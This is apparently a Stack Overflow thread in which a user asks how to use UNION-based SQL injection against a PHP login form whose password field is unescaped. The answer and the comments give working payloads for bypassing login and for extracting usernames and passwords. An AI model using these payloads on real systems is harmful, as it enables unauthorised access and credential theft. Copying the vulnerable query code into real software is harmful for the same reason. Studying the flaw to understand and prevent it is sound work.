# How to use mySQL UNION operator in sql injection, with injectable password paramiter?

Tags: php, sql-injection, mysql

Can someone give me an example of sql injection with UNION operator, that returns users and passwords, with regards to the bellow php example. I've managed to inject simple 1 or 1=1... in the pass parameter, but so far failed to inject using UNION operator.

```
function sanitizeStr($var)
{
global $connection;
$var = strip_tags($var);
$var = htmlentities($var);
$var = stripslashes($var);
return $connection->real_escape_string($var);
}

function sanitizeStrSQ51($var)
{
return ($var);
}

$error = $user = $pass = "";

if (isset($_POST['user']))
{
$user = sanitizeStr($_POST['user']);
$pass = sanitizeStrSQ51($_POST['pass']);

if ($user == "" || $pass == "")
$error = "Not all fields were entered<br>";

else
{
$result = queryMySQL("SELECT user,pass FROM members WHERE user='$user' AND pass='$pass'");
if ($result->num_rows == 0)
{
$error = "<span class='error'>Username/Password invalid</span><br><br>";
}

else
{
$_SESSION['user'] = $user;
$_SESSION['pass'] = $pass;
die("You are now logged in. Please <a href='members.php?view=$user'>" . "click here</a> to continue.<br><br>");
}
}
}
```

Answer (score 1, accepted):

The query takes two parameters, `$user` and `$pass`. As you can see, the `$user` variable is properly quoted, while the `$pass` variable is used as-is, which makes it vulnerable to Sql Injection. From the code it is evident that all we need to do is to return any value from the query in order to get access:

```
    if ($result->num_rows == 0) {
      $error = "<span class='error'>Username/Password invalid</span><br><br>";
    } else {
```

Set the `$user` parameter to the name of an existing user, let's say 'admin', because it will be used afterwards by this code:

```
      $_SESSION['user'] = $user;
```

Set the `$pass` parameter to:

```
whatever' UNION SELECT 0,1 --
```

So the query becomes

```
SELECT user,pass FROM members WHERE user='admin' AND pass='whatever' UNION SELECT 0,1 -- '
```

Note the "-- " at the end of the query. This is a comment, which helps us get rid of the last single quote. The whitespace after the double-dash is required, otherwise MySQL won't recognize the comment. Alternatively you can use the `#` symbol. More info here: [MySQL Comment Syntax](http://dev.mysql.com/doc/refman/5.7/en/comments.html)

Comment: Or without any comment: `whatever' UNION SELECT 0,'1`

Comment: @Gumbo, yep, it is even better that way

Comment: Ok, so I want to return user and pass rows, could i use: whatever' UNION SELECT FROM members WHERE user='1=1' -- , will this work?

Comment: @Gazel, you need to specify columns: `whatever' UNION SELECT user,pass FROM members WHERE user='someuser`

Comment: @tokarev The quarry is accepted with no sql errors, and I'm prompted to continue to the account. However, it did not return any row values that were specified in UNION operator. I used the same php login form as in my question. So why it did not return rows that were specified in the UNION operator?

Comment: I'm going to put my previous comment as a new question.